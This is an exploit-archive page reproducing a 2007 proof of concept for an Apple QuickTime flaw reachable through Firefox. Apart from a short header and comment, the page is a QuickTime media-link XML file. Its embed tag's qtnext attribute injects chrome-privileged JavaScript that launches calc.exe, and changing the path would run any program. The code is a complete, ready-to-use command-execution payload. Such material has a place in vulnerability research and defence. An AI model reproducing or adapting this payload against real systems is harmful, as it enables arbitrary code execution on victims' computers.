Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)
# Published : 2007-09-12
# Author : pdp
# Previous Title : Microsoft SQL Server Distributed Management Objects BoF Exploit
# Next Title : Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution

<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox. 
The result of this vulnerability can lead to full compromise of 
the browser and maybe even the underlaying operating system. 
Don't try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\windows\system32\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

# www.Syue.com [2007-09-12]